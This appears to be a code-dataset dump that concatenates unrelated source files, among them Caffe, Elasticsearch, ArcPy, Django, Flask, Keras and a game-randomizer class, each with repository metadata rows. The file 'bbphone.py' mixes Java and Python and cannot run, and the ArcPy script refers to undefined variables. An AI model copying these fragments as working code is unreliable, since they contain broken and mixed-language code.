bias_filler=dict(type='constant', value=0))
n.loss = L.SoftmaxWithLoss(n.classifier, n.label)
if phase == 'TRAIN':
pass
else:
n.accuracy_top1 = L.Accuracy(n.classifier, n.label, include=dict(phase=1))
n.accuracy_top5 = L.Accuracy(n.classifier, n.label, include=dict(phase=1),
accuracy_param=dict(top_k=5))
return n.to_proto()
| 51.363057 | 130 | 0.637773 | 3,297 | 0.408854 | 0 | 0 | 0 | 0 | 0 | 0 | 2,325 | 0.288318 |
2cb169a96cf55ed5e83fe9eb7891602b251f5fd7 | 3,145 | py | Python | app/commands/elastic.py | viert/knowledgehub | 295a66002f26d694e518af97ad80269d69d59adf | [
"MIT"
] | 8 | 2020-06-16T07:45:35.000Z | 2020-08-10T10:11:50.000Z | app/commands/elastic.py | viert/knowledgehub | 295a66002f26d694e518af97ad80269d69d59adf | [
"MIT"
] | 2 | 2021-10-06T18:31:08.000Z | 2022-02-19T03:32:29.000Z | app/commands/elastic.py | viert/knowledgehub | 295a66002f26d694e518af97ad80269d69d59adf | [
"MIT"
] | null | null | null | from datetime import datetime
from glasskit.commands import Command
from glasskit import ctx
from ask.models.post import BasePost
from ask import force_init_app
POST_INDEX_SETTINGS = {
"settings": {
"analysis": {
"normalizer": {
"lower": {
"type": "custom",
"char_filter": [],
"filter": ["lowercase"]
}
}
}
},
"mappings": {
"properties": {
"title": {
"type": "text",
"analyzer": "russian",
},
"body": {
"type": "text",
"analyzer": "russian",
},
"tags": {
"type": "keyword",
"normalizer": "lower",
},
"type": {
"type": "text",
}
}
}
}
class Elastic(Command):
def init_argument_parser(self, parser):
subparsers = parser.add_subparsers(
help="action to perform with index",
dest="action"
)
idx = subparsers.add_parser("index", help="index documents")
idx.add_argument("--all", "-a", action="store_true", default=False,
help="re-index from scratch")
idx.add_argument("--drop", "-d", action="store_true", default=False,
help="drop existing index before re-indexing")
@staticmethod
def drop():
t1 = datetime.now()
ctx.es.indices.delete(index="posts", ignore=[400, 404])
t2 = datetime.now()
dt = (t2 - t1).total_seconds()
ctx.log.info("Index dropped in %.3f seconds", dt)
@staticmethod
def prepare():
t1 = datetime.now()
ctx.es.indices.create(index="posts", body=POST_INDEX_SETTINGS)
t2 = datetime.now()
dt = (t2 - t1).total_seconds()
ctx.log.info("Index set up in %.3f seconds", dt)
def reindex(self):
if self.args.all:
if self.args.drop:
self.drop()
self.prepare()
t1 = datetime.now()
updated = 0
created = 0
for post in BasePost.find():
doc = post.get_indexer_document()
if doc is None:
continue
resp = ctx.es.index(index="posts", id=post._id, body=doc)
if resp["result"] == "created":
created += 1
elif resp["result"] == "updated":
updated += 1
t2 = datetime.now()
dt = (t2 - t1).total_seconds()
ctx.log.info("Posts full reindexing completed. Created %d, updated %d documents in %.3f seconds",
created, updated, dt)
else:
raise NotImplementedError("partial reindex is not implemented")
def run(self):
force_init_app()
if ctx.es is None:
ctx.log.error("elasticsearch is not configured properly, giving up")
return
if self.args.action == 'index':
self.reindex()
| 29.669811 | 109 | 0.480445 | 2,232 | 0.709698 | 0 | 0 | 501 | 0.1593 | 0 | 0 | 707 | 0.224801 |
2cb4d9e9fa72ff7492cc09a76f5ecff9cc15231c | 6,350 | py | Python | PolygonLineTools/Scripts/split_by_area.py | Dan-Patterson/Tools_for_ArcGIS_Pro | b5c253d59d57bd1abe7e2433a77aed7d3ea22567 | [
"Info-ZIP"
] | 23 | 2020-05-15T18:40:25.000Z | 2022-03-31T08:44:39.000Z | PolygonLineTools/Scripts/split_by_area.py | Dan-Patterson/Tools_for_ArcGIS_Pro | b5c253d59d57bd1abe7e2433a77aed7d3ea22567 | [
"Info-ZIP"
] | 1 | 2021-12-14T16:47:00.000Z | 2021-12-15T03:06:26.000Z | PolygonLineTools/Scripts/split_by_area.py | Dan-Patterson/Tools_for_ArcGIS_Pro | b5c253d59d57bd1abe7e2433a77aed7d3ea22567 | [
"Info-ZIP"
] | 3 | 2021-08-09T05:42:19.000Z | 2022-03-31T08:44:59.000Z | # -*- coding: UTF-8 -*-
"""
split_by_area
===========
Script : split_by_area.py
Author : Dan_Patterson@carleton.ca
Modified: 2018-08-27
Purpose : tools for working with numpy arrays
Notes:
-----
The xs and ys form pairs with the first and last points being identical
The pairs are constructed using n-1 to ensure that you don't form a
line from identical points.
First split polygon is a sample of a multipart. Added 0, 0 and 0, 80
back in
>>> xs = [0., 0., 80., 0, 0., 100., 100., 0.]
>>> ys = [0., 30., 30., 80., 100., 100., 0., 0.]
>>> a = np.array(list(zip(xs, ys))) * 1.0 # --- must be floats
>>> v = np.array([[50., 0], [50, 100.]])
>>> ext = np.array([[0., 0], [0, 100.],[100, 100.], [100., 0.], [0., 0.]])
return a, v
References:
----------
`<https://stackoverflow.com/questions/3252194/numpy-and-line-intersections>`_.
`<https://community.esri.com/message/627051?commentID=627051#comment-627051>`
`<https://community.esri.com/message/779043-re-how-to-divide-irregular-
polygon-into-equal-areas-using-arcgis-105?commentID=779043#comment-779043>`
This is a good one
`<https://tereshenkov.wordpress.com/2017/09/10/dividing-a-polygon-into-a-given
-number-of-equal-areas-with-arcpy/>`
---------------------------------------------------------------------
"""
# ---- imports, formats, constants ----
import sys
import math
from textwrap import dedent
import numpy as np
import warnings
from arcpytools_plt import (tweet, fc_info, _poly_ext,
trans_rot, cal_area, get_polys)
import arcpy
warnings.simplefilter('ignore', FutureWarning)
ft = {'bool': lambda x: repr(x.astype(np.int32)),
'float_kind': '{: 0.3f}'.format}
np.set_printoptions(edgeitems=5, linewidth=80, precision=2, suppress=True,
threshold=100, formatter=ft)
np.ma.masked_print_option.set_display('-') # change to a single -
script = sys.argv[0] # print this should you need to locate the script
# ---- Do the work or run the demo ------------------------------------------
#
frmt = """
Input features.... {}
Output features... {}
Number of splits . {}
Split types ...... {}
"""
def _cut_poly(poly, p_id, step=1.0, split_axis="X", split_fac=4, SR=None):
"""Perform the poly* cutting and return the result.
step : number
fractional step for division, 1.0 equates to 1%
split_face : number
number of areas to produce, 4, means split into 4 equal areas
"""
L, B, R, T = _poly_ext(poly)
# s_fac = math.ceil((R - L)/step)
# lefts = np.linspace(L+dx, R, num=s_fac, endpoint=True)
dx = step
dy = step
if split_axis == "X":
lefts = np.arange(L+dx, R+dx, dx, dtype='float')
splitters = np.array([[[l, B-1.0], [l, T+1.0]] for l in lefts])
elif s_axis == 'Y':
tops = np.arange(B+dy, T+dy, dy, dtype='float')
splitters = np.array([[[R+1.0, t], [L-1.0, t]] for t in tops])
cutters = []
for s in splitters:
s = s.tolist()
c = arcpy.Polyline(arcpy.Array([arcpy.Point(*xy) for xy in s]), SR)
cutters.append(c)
# ----
cuts = []
for i in cutters:
rght = poly
if i.crosses(poly):
try:
left, rght = poly.cut(i)
if rght is None:
cuts.append(left)
cuts.append(left)
poly = rght
rght = left
except RuntimeError:
tweet("Issues with poly...{}".format(p_id))
continue
else:
cuts.append(rght)
return cuts, cutters
def final_cut(cutters, poly):
""" final cut
"""
cuts = []
for i in cutters:
rght = poly
if i.crosses(poly):
try:
left, rght = poly.cut(i)
if rght is None:
cuts.append(left)
cuts.append(left)
poly = rght
rght = left
except RuntimeError:
tweet("Issues with poly...{}".format(p_id))
continue
else:
cuts.append(rght)
return cuts # , cutters
# ---- demo and tool section -------------------------------------------------
#
if len(sys.argv) == 1:
testing = False
in_pth = script.split("/")[:-2] + ["Polygon_lineTools.gdb"]
in_fc = "/".join(in_pth) + "/shapes_mtm9"
out_fc = "/".join(in_pth) + "/c0"
s_axis = "Y"
s_fac = 4
else:
testing = False
in_fc = sys.argv[1]
out_fc = sys.argv[2]
s_fac = int(sys.argv[3])
s_axis = sys.argv[4]
# ---- for both
#
shp_fld, oid_fld, shp_type, SR = fc_info(in_fc)
out_polys, out_ids = get_polys(in_fc)
#old_ids = np.repeat(out_ids, s_fac) # produce data for the output id field
# ---- instant bail
if SR.type == 'Projected':
result_ = []
for i in range(len(out_polys)):
poly = out_polys[i]
p_id = out_ids[i]
cuts, cutters = _cut_poly(poly, p_id, step=1,
split_axis = s_axis,
split_fac=4, SR=SR)
idxs = cal_area(poly, cuts, cutters, s_fac)
f_cutters = [cutters[i] for i in idxs]
r = final_cut(f_cutters, poly)
result_.extend(r)
if not testing:
if arcpy.Exists(out_fc):
arcpy.Delete_management(out_fc)
arcpy.CopyFeatures_management(result_, out_fc)
out_ids = np.repeat(out_ids, s_fac)
id_fld = np.zeros((len(result_),),
dtype=[("key", "<i4"), ("Old_ID", "<i4")])
id_fld["key"] = np.arange(1, len(result_) + 1)
id_fld["Old_ID"] = out_ids
arcpy.da.ExtendTable(out_fc, oid_fld, id_fld, "key")
else:
msg = """
-----------------------------------------------------------------
Input data is not in a projected coordinate system....
bailing...
-----------------------------------------------------------------
"""
tweet(msg)
# ----------------------------------------------------------------------
# __main__ .... code section
if __name__ == "__main__":
"""Optionally...
: - print the script source name.
: - run the _demo
"""
| 31.435644 | 79 | 0.517008 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,826 | 0.445039 |
2cb66c34c6dad5e2ecafad8d080c45ac92930ec1 | 2,081 | py | Python | clustering/utils.py | IhabBendidi/IIC-SimCLR-MoCo-clusterer | be04de5051aba1b181279eb759907ab21f480fcd | [
"Apache-2.0"
] | 12 | 2021-11-09T15:24:10.000Z | 2022-02-13T19:05:51.000Z | clustering/utils.py | IhabBendidi/IIC-SimCLR-MoCo-clusterer | be04de5051aba1b181279eb759907ab21f480fcd | [
"Apache-2.0"
] | null | null | null | clustering/utils.py | IhabBendidi/IIC-SimCLR-MoCo-clusterer | be04de5051aba1b181279eb759907ab21f480fcd | [
"Apache-2.0"
] | null | null | null | from scipy import linalg
from sklearn.decomposition import PCA
from scipy.optimize import linear_sum_assignment as linear_assignment
import numpy as np
"""
A function that takes a list of clusters, and a list of centroids for each cluster, and outputs the N max closest images in each cluster to its centroids
"""
def closest_to_centroid(clusters,centroids,nb_closest=20):
output = [[] for i in range(len(centroids))]
#print(clusters)
for i in range(len(centroids)):
centroid = centroids[i]
cluster = clusters[i]
try :
cluste_temp = [x.cpu() if x.is_cuda else x for x in cluster]
except :
cluste_temp = cluster
cluster = [list(x) for x in cluste_temp]
nb_components = 7 if len(cluster)>10 else len(cluster) - 1
pca = PCA(n_components=nb_components) #args.sty_dim)
if len(cluster) > nb_closest :
cluster = pca.fit_transform(cluster)
centroid = centroid.reshape(1, -1)
centroid = pca.transform(centroid)
distances = [linalg.norm(x-centroid) for x in cluster]
duplicate_distances = distances
distances.sort()
if len(distances)>=nb_closest :
distances = distances[:nb_closest]
output[i] = [True if x in distances else False for x in duplicate_distances]
return output
def cluster_acc(y_true, y_pred):
"""
Calculate clustering accuracy. Require scikit-learn installed
# Arguments
y: true labels, numpy.array with shape `(n_samples,)`
y_pred: predicted labels, numpy.array with shape `(n_samples,)`
# Return
accuracy, in [0,1]
"""
y_true = y_true.astype(np.int64)
assert y_pred.size == y_true.size
D = max(y_pred.max(), y_true.max()) + 1
w = np.zeros((D, D), dtype=np.int64)
for i in range(y_pred.size):
w[y_pred[i], y_true[i]] += 1
ind = linear_assignment(w.max() - w)
indi = list(ind[0])
indj = list(ind[1])
the_sum = sum([w[i, j] for i, j in zip(indi,indj)])
return the_sum * 1.0 / y_pred.size
| 35.87931 | 153 | 0.640077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 458 | 0.220086 |
2cb740471359d11f904828cc498bfc6b7c07a43b | 1,247 | py | Python | Prep/bbphone.py | armsky/Algorithms | 04fe858f001d7418f8e0eab454b779fe1e863483 | [
"Apache-2.0"
] | null | null | null | Prep/bbphone.py | armsky/Algorithms | 04fe858f001d7418f8e0eab454b779fe1e863483 | [
"Apache-2.0"
] | null | null | null | Prep/bbphone.py | armsky/Algorithms | 04fe858f001d7418f8e0eab454b779fe1e863483 | [
"Apache-2.0"
] | 2 | 2019-06-27T09:05:07.000Z | 2019-07-01T04:41:53.000Z | // This is the text editor interface.
// Anything you type or change here will be seen by the other person in real time.
import java.util.*;
public class HelloWorld {
public static boolean isSentence(String s, HashSet<String> d) {
return false;
}
public static void main(String[] args) {
// Prints "Hello, World" to the terminal window.
HashSet<String> dictionary=new HashSet<String> ();
dictionary.add("I");
dictionary.add("LOVE");
dictionary.add("TO");
dictionary.add("EAT");
dictionary.add("TACOS");
dictionary.add("MEET");
dictionary.add("ME");
dictionary.add("THERE");
String s="ILOVETOEATTACOS";
//String s="MEETMETHERE";
System.out.println(isSentence(s,dictionary));
}
}
def isSentence(s, d):
if not s:
return True
if s in d:
return True
mark = False
for i in range(1, len(s)+1):
if s[0:i] in d:
if isSentence(s[i:], d):
mark = True
return mark
s = "AILOVE"
print isSentence(s,d)
s = "ILOVE"
print isSentence(s,d)
s = "ILOVEA"
print isSentence(s,d)
s="ILOVETOEATTACOS"
print isSentence(s,d)
s="MEETMETHERE"
print isSentence(s,d)
| 22.267857 | 82 | 0.597434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 139 | 0.111468 |
2cb9006dc93f30229a35a9a95092c8065ef3469e | 860 | py | Python | phantastes/urls.py | santeyio/phantastesproject | 5ce1e2cb59e8283fe280e01d0e185be62cd4001a | [
"MIT"
] | null | null | null | phantastes/urls.py | santeyio/phantastesproject | 5ce1e2cb59e8283fe280e01d0e185be62cd4001a | [
"MIT"
] | null | null | null | phantastes/urls.py | santeyio/phantastesproject | 5ce1e2cb59e8283fe280e01d0e185be62cd4001a | [
"MIT"
] | null | null | null | from django.conf import settings
from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.views.generic import TemplateView
from phantastes import views
from django.contrib import admin
urlpatterns = patterns(
"",
url(r"^$", views.index, name="home"),
url(r"^forum/", include('spirit.urls')),
url(r"^admin/", include(admin.site.urls)),
url(r"^account/", include("account.urls")),
url(r"^profile/", include("profiles.urls", namespace="profiles")),
url(r"^polls/", include("polls.urls", namespace="polls")),
url(r"^readings/", include("readings.urls", namespace="readings")),
url(r"^about/$", views.about, name="about"),
url(r'^chat/', include('djangoChat.urls', namespace="djangoChat")),
)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 35.833333 | 76 | 0.696512 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 232 | 0.269767 |
2cba7250d153e2ae0ada8d707ceeee8f346b2d8c | 335 | py | Python | mox/manage.py | abouzek/mox | 35f1836a9aa9a320d0df8da77e3ebacaa1eb15c4 | [
"MIT"
] | null | null | null | mox/manage.py | abouzek/mox | 35f1836a9aa9a320d0df8da77e3ebacaa1eb15c4 | [
"MIT"
] | null | null | null | mox/manage.py | abouzek/mox | 35f1836a9aa9a320d0df8da77e3ebacaa1eb15c4 | [
"MIT"
] | null | null | null | import os, sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from flask.ext.script import Manager, Server
from app import app
manager = Manager(app)
manager.add_command("runserver", Server(
use_debugger = True,
use_reloader = True,
host = '0.0.0.0')
)
if __name__ == "__main__":
manager.run()
| 19.705882 | 79 | 0.713433 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 34 | 0.101493 |
2cc0826258661c4861e70f37cdbf8acd649ca6e6 | 5,035 | py | Python | train.py | sremedios/nifti_image_generator | ffd476fa3d12a2cfb12250d903efd2277dc3426b | [
"MIT"
] | 6 | 2019-07-11T18:00:19.000Z | 2022-01-27T22:50:57.000Z | train.py | sremedios/nifti_image_generator | ffd476fa3d12a2cfb12250d903efd2277dc3426b | [
"MIT"
] | 1 | 2019-02-26T14:20:32.000Z | 2019-02-26T14:20:32.000Z | train.py | sremedios/nifti_image_generator | ffd476fa3d12a2cfb12250d903efd2277dc3426b | [
"MIT"
] | 7 | 2019-01-07T19:30:51.000Z | 2021-05-17T19:23:23.000Z | '''
Samuel Remedios
NIH CC CNRM
Train PhiNet to classify MRI modalities
'''
import os
import json
from keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau, EarlyStopping
from keras import backend as K
from keras.models import model_from_json
from models.phinet import phinet, phinet_2D
from models.multi_gpu import ModelMGPU
from utils.nifti_image import NIfTIImageDataGenerator
from utils.augmentations import *
from utils.utils import parse_args, now
os.environ['FSLOUTPUTTYPE'] = 'NIFTI_GZ'
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
if __name__ == '__main__':
############### DIRECTORIES ###############
results = parse_args("train")
NUM_GPUS = 1
if results.GPUID == None:
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
elif results.GPUID == -1:
NUM_GPUS = 3
else:
os.environ["CUDA_VISIBLE_DEVICES"] = str(results.GPUID)
TRAIN_DIR = os.path.abspath(os.path.expanduser(results.TRAIN_DIR))
VAL_DIR = os.path.abspath(os.path.expanduser(results.VAL_DIR))
classes = results.classes.replace(" ", "").split(',')
WEIGHT_DIR = os.path.abspath(os.path.expanduser(results.OUT_DIR))
MODEL_NAME = "phinet_model_" + "-".join(classes)
MODEL_PATH = os.path.join(WEIGHT_DIR, MODEL_NAME+".json")
SAMPLE_AUG_PATH = os.path.join("data", "augmented_slices")
AUG_FILE_PREFIX = "augmented_file"
for d in [WEIGHT_DIR, SAMPLE_AUG_PATH]:
if not os.path.exists(d):
os.makedirs(d)
patch_size = (45, 45)
num_patches = 100
############### MODEL SELECTION ###############
'''
if results.model:
with open(results.model) as json_data:
model = model_from_json(json.load(json_data))
model.load_weights(results.weights)
'''
LR = 1e-5
if len(patch_size) == 2:
model = phinet_2D(model_path=MODEL_PATH,
n_classes=len(classes),
learning_rate=LR,
num_channels=1,
num_gpus=NUM_GPUS,
verbose=0,)
elif len(patch_size) == 3:
model = phinet(model_path=MODEL_PATH,
n_classes=len(classes),
learning_rate=LR,
num_channels=1,
num_gpus=NUM_GPUS,
verbose=0,)
if results.weights:
model.load_weights(results.weights)
############### DATA IMPORT ###############
# augmentations occur in the order they appear
train_augmentations = {
rotate_3D: {"max_angle": 30,
"direction_length": 3},
get_patch_2D: {"patch_size": patch_size,
"num_patches": num_patches,
"transpose_chance": 0.5},
}
val_augmentations = {
get_patch_2D: {"patch_size": patch_size,
"num_patches": num_patches,
"transpose_chance": 0},
}
num_files = 2087
num_val_files = 600
batch_size = 16
params = {
# 'target_size': (256, 256, 256),
'target_size': patch_size,
'batch_size': batch_size,
'class_mode': 'categorical',
'num_patches': num_patches,
# 'axial_slice': 2,
#'save_to_dir': SAMPLE_AUG_PATH,
#'save_prefix': AUG_FILE_PREFIX,
}
train_params = {'augmentations': train_augmentations}
val_params = {'augmentations': val_augmentations}
train_datagen = NIfTIImageDataGenerator()
test_datagen = NIfTIImageDataGenerator()
train_generator = train_datagen.flow_from_directory(
TRAIN_DIR, **params, **train_params)
validation_generator = test_datagen.flow_from_directory(
VAL_DIR, **params, **val_params)
############### CALLBACKS ###############
callbacks_list = []
# Checkpoint
WEIGHT_NAME = MODEL_NAME.replace("model", "weights") + "_" +\
now()+"-epoch-{epoch:04d}-val_acc-{val_acc:.4f}.hdf5"
fpath = os.path.join(WEIGHT_DIR, WEIGHT_NAME)
checkpoint = ModelCheckpoint(fpath,
monitor='val_acc',
verbose=1,
save_best_only=True,
mode='max',
save_weights_only=True)
callbacks_list.append(checkpoint)
# Early Stopping, used to quantify convergence
es = EarlyStopping(monitor='val_acc', min_delta=1e-4, patience=20)
callbacks_list.append(es)
############### TRAINING ###############
model.fit_generator(train_generator,
validation_data=validation_generator,
steps_per_epoch=num_files//batch_size, # total number of images
epochs=100000,
validation_steps=num_val_files//batch_size, # total number val images
callbacks=callbacks_list)
# TODO: ensure that the classes learned can be predicted upon
K.clear_session()
| 32.275641 | 94 | 0.58431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,285 | 0.255214 |
2cc35cd363ef4cfec9425fc3d0c72127f474a4df | 960 | py | Python | rehive/api/resources/company_resources.py | rehive/rehive-python | 72cf7208db8e99711ea8568073577be3459c79fc | [
"MIT"
] | 8 | 2017-06-23T13:33:59.000Z | 2022-01-17T10:55:23.000Z | rehive/api/resources/company_resources.py | rehive/rehive-python | 72cf7208db8e99711ea8568073577be3459c79fc | [
"MIT"
] | 59 | 2017-06-23T13:21:01.000Z | 2022-01-10T17:41:22.000Z | rehive/api/resources/company_resources.py | rehive/rehive-python | 72cf7208db8e99711ea8568073577be3459c79fc | [
"MIT"
] | 3 | 2017-10-12T18:43:29.000Z | 2018-12-26T09:38:42.000Z | from .base_resources import Resource, ResourceCollection, ResourceList
class APICompany(Resource, ResourceCollection):
def __init__(self, client, endpoint='', filters=None):
self.resources = (
APIBanks,
APICurrencies,
APIBankAccount,
APIBankAccounts
)
super(APICompany, self).__init__(client, endpoint, filters)
self.create_resources(self.resources)
@classmethod
def get_resource_name(cls):
return 'company'
class APIBanks(ResourceList):
@classmethod
def get_resource_name(cls):
return 'bank'
class APICurrencies(ResourceList):
@classmethod
def get_resource_name(cls):
return 'currencies'
class APIBankAccount(Resource):
@classmethod
def get_resource_name(cls):
return 'bank-account'
class APIBankAccounts(Resource):
@classmethod
def get_resource_name(cls):
return 'bank-accounts'
| 20.869565 | 70 | 0.667708 | 874 | 0.910417 | 0 | 0 | 356 | 0.370833 | 0 | 0 | 58 | 0.060417 |
2cc3e1fe2b2d86ca07ffd45b8265bde07b843fe1 | 325,343 | py | Python | src/randomizer/randomizer/classes.py | DontBaguMe/IoGR | 3ab69c7a47133b82517aced5db5ece8f15d5727d | [
"Unlicense"
] | 12 | 2019-05-06T12:31:06.000Z | 2020-07-21T19:24:44.000Z | src/randomizer/randomizer/classes.py | DontBaguMe/IoGR | 3ab69c7a47133b82517aced5db5ece8f15d5727d | [
"Unlicense"
] | 2 | 2020-06-11T22:12:15.000Z | 2021-10-20T22:53:42.000Z | src/randomizer/randomizer/classes.py | DontBaguMe/IoGR | 3ab69c7a47133b82517aced5db5ece8f15d5727d | [
"Unlicense"
] | 7 | 2019-08-11T00:06:03.000Z | 2021-06-13T04:19:19.000Z | import copy
import time
from datetime import datetime
import binascii
import graphviz
import random
from .models.enums.start_location import StartLocation
from .models.enums.goal import Goal
from .models.enums.statue_req import StatueReq
from .models.enums.entrance_shuffle import EntranceShuffle
from .models.enums.enemizer import Enemizer
from .models.enums.logic import Logic
from .models.randomizer_data import RandomizerData
MAX_INVENTORY = 15
PROGRESS_ADJ = [1.5, 1.25, 1, 0.75] # Required items are more likely to be placed in easier modes
MAX_CYCLES = 100
INACCESSIBLE = 9999
class World:
# Assigns item to location
def fill_item(self, item, location=-1,test=False,override_restrictions=False,print_log=False):
if location == -1:
return False
elif self.item_locations[location][2]:
if print_log:
print("ERROR: Attempted to place an item in a full location")
return False
elif item in self.item_locations[location][4] and not override_restrictions:
if print_log:
print("ERROR: Attempt to place item in a restricted location:",[self.item_pool[item][3],self.item_locations[location][9]])
return False
elif test:
return True
self.item_pool[item][0] -= 1
self.item_locations[location][2] = True
self.item_locations[location][3] = item
if print_log:
print(" ",self.item_pool[item][3],"->",self.item_locations[location][9])
if self.is_accessible(self.item_locations[location][0]):
self.items_collected.append(item)
if location in self.open_locations[0]:
self.open_locations[0].remove(location)
elif location in self.open_locations[1]:
self.open_locations[1].remove(location)
self.placement_log.append([item, location])
#if self.item_locations[location][1] == 2:
# self.check_logic()
return True
# Removes an assigned item and returns it to item pool
def unfill_item(self, location=-1, print_log=False):
if location == -1:
return -1
elif not self.item_locations[location][2]:
return -1
item = self.item_locations[location][3]
self.item_locations[location][2] = False
self.item_locations[location][3] = 0
self.item_pool[item][0] += 1
if print_log:
print(" ",self.item_pool[item][3],"<-",self.item_locations[location][9],"removed")
if self.is_accessible(self.item_locations[location][0]):
if item in self.items_collected:
self.items_collected.remove(item)
type = self.item_pool[item][1]
if location not in self.open_locations[type-1]:
self.open_locations[type-1].append(location)
for x in self.placement_log:
if x[1] == location:
self.placement_log.remove(x)
return item
# Converts item pool into list of unique items, returns list
def list_item_pool(self, type=0, items=[], progress_type=0):
item_list = []
for x in self.item_pool:
if not items or x in items:
if not type or type == self.item_pool[x][1]:
if not progress_type or progress_type == self.item_pool[x][5]:
i = 0
while i < self.item_pool[x][0]:
item_list.append(x)
i += 1
return item_list
# Returns a list of unfilled item locations
def list_item_locations(self):
locations = []
for x in self.item_locations:
locations.append(x)
return locations
# Returns list of graph edges
def list_logic(self):
edges = []
for x in self.logic:
edges.append(x)
return edges
# Checks if one list is contained inside another list
def is_sublist(self, list, sublist):
if sublist == []:
return True
elif sublist == list:
return True
elif len(sublist) > len(list):
return False
l = list[:]
for x in sublist:
if x in l:
l.remove(x)
else:
return False
return True
# Returns lists of accessible item, ability, and statue locations
def find_open_locations(self):
# Accessible open location for items, abilities, and Mystic Statues
locations = [[], [], [], []]
for x in self.item_locations:
region = self.item_locations[x][0]
type = self.item_locations[x][1]
if self.graph[region][0] and not self.item_locations[x][2]:
locations[type - 1].append(x)
self.open_locations[0] = locations[0][:]
self.open_locations[1] = locations[1][:]
return locations
# Returns graph node of an item location
def location_node(self, location_id=-1,print_log=False):
if location_id not in self.item_locations:
if print_log:
print("ERROR: Invalid item location", location_id)
return False
else:
return self.item_locations[location_id][0]
# Returns whether an item location is already filled with an item
def is_filled(self, location_id=-1,print_log=False):
if location_id not in self.item_locations:
if print_log:
print("ERROR: Invalid item location", location_id)
return False
else:
return self.item_locations[location_id][2]
# Zeroes out accessible flags for all world regions
def is_accessible(self, node_id=-1):
if node_id not in self.graph:
return False
elif self.graph[node_id][0]:
return True
else:
return False
# Zeroes out accessible flags for all world regions
def unsolve(self,reset_graph=False):
for x in self.graph:
self.graph[x][0] = False
if reset_graph:
self.graph[x][4] = 0
self.graph[x][8].clear()
self.graph[x][9].clear()
self.graph[x][10] = self.graph[x][1][:]
for x in self.logic:
if self.logic[x][0] == 1:
self.logic[x][0] = 0
return True
# Resets collected items and other traversal data
def reset_progress(self,reset_graph=False):
self.visited.clear()
self.items_collected.clear()
self.item_destinations.clear()
self.open_locations = [[],[]]
self.open_edges = []
self.unsolve(reset_graph)
return True
# Finds every accessible node in the graph
# Collects items into self.items_collected, edges into self.open_edges
def traverse(self,to_visit=[],test=False,print_log=False):
if print_log:
print(" Beginning traversal...")
visited = []
new_items = []
if not to_visit:
to_visit.append(0)
while to_visit:
node = to_visit.pop(0)
visited.append(node)
if print_log:
print(" Visiting:",self.graph[node][5])
# If we haven't been here yet...
if not self.graph[node][0]:
# Get the newly-accessible items and record open item/ability locations
new_items += self.visit_node(node,test,print_log)
# Queue up newly-accessible places to visit
for x in self.graph[node][10]:
if x != node and not self.is_accessible(x) and x not in to_visit+visited:
to_visit.insert(0,x)
if print_log:
print(" -Discovered:",self.graph[x][5])
# If we've run out of places to visit, check if logic has opened up any new nodes
if not to_visit:
open_edges = self.get_open_edges(visited)
bad_edges = []
if print_log:
print(" Ran out of places - updating logic:")
for edge in open_edges:
dest = self.logic[edge][2]
if self.check_edge(edge,[],False) and dest not in to_visit:
self.logic[edge][0] = 1
to_visit.append(dest)
if print_log:
print(" -Discovered:",self.graph[dest][5])
else:
bad_edges.append(edge)
if not test:
self.open_edges = bad_edges
return [visited,new_items]
# Return list of logic edges that originate in an accessible node and end in an inaccessible node
def get_open_edges(self,nodes=[]):
test_edges = self.open_edges[:]
open_edges = []
for x in nodes:
if not self.is_accessible(x):
test_edges += self.graph[x][12]
for edge in test_edges:
origin = self.logic[edge][1]
dest = self.logic[edge][2]
if self.logic[edge][0] >= 0 and not self.is_accessible(dest) and dest not in nodes:
open_edges.append(edge)
return open_edges
# Visit a node, update graph info, return new items collected
def visit_node(self,node,test=False,print_log=False):
if not test and not self.graph[node][0]:
self.graph[node][0] = True
self.visited.append(node)
self.item_destinations += self.graph[node][6]
self.open_edges += self.graph[node][12]
return self.collect_items(node,test,print_log)
# Collect all items in given node
def collect_items(self,node=-1,test=False,print_log=False):
if node not in self.graph:
return False
items_found = []
for location in self.graph[node][11]:
if self.item_locations[location][2]:
items_found.append(self.item_locations[location][3])
if not test:
self.items_collected.append(self.item_locations[location][3])
if print_log:
print(" -Collected:",self.item_pool[self.item_locations[location][3]][3])
elif self.item_locations[location][1] == 1 and not test:
self.open_locations[0].append(location)
if print_log:
print(" -Discovered:",self.item_locations[location][9])
elif self.item_locations[location][1] == 2 and not test:
self.open_locations[1].append(location)
if print_log:
print(" -Discovered:",self.item_locations[location][9])
return items_found
# Returns full list of accessible locations
def accessible_locations(self, item_locations):
accessible = []
for x in item_locations:
region = self.item_locations[x][0]
if self.is_accessible(region):
accessible.append(x)
return accessible
# Returns full list of inaccessible locations
def inaccessible_locations(self, item_locations):
inaccessible = []
for x in item_locations:
region = self.item_locations[x][0]
if not self.is_accessible(region):
inaccessible.append(x)
return inaccessible
# Fill a list of items randomly in a list of locations
def random_fill(self, items=[], item_locations=[], accessible=True, print_log=False):
if not items:
return True
elif not item_locations:
return False
to_place = items[:]
to_fill = item_locations[:]
while to_place:
item = to_place.pop(0)
item_type = self.item_pool[item][1]
placed = False
i = 0
for dest in to_fill:
if not placed:
region = self.item_locations[dest][0]
location_type = self.item_locations[dest][1]
filled = self.item_locations[dest][2]
restrictions = self.item_locations[dest][4]
if not filled and item_type == location_type and item not in restrictions:
if not accessible or region != INACCESSIBLE:
if self.fill_item(item, dest, False, False, print_log):
to_fill.remove(dest)
placed = True
return True
# Place list of items into random accessible locations
def forward_fill(self, items=[], item_locations=[], test=False, override_restrictions=False, print_log=False):
if not items:
return True
elif not item_locations:
if print_log:
print("ERROR: No item locations given")
return False
to_place = items[:]
to_fill =[[],[],[]]
for loc in item_locations:
if not self.item_locations[loc][2] and self.is_accessible(self.item_locations[loc][0]):
loc_type = self.item_locations[loc][1]
to_fill[loc_type-1].append(loc)
quarantine = [[],[],[]]
filled_locations = []
while to_place:
item = to_place.pop(0)
item_type = self.item_pool[item][1]
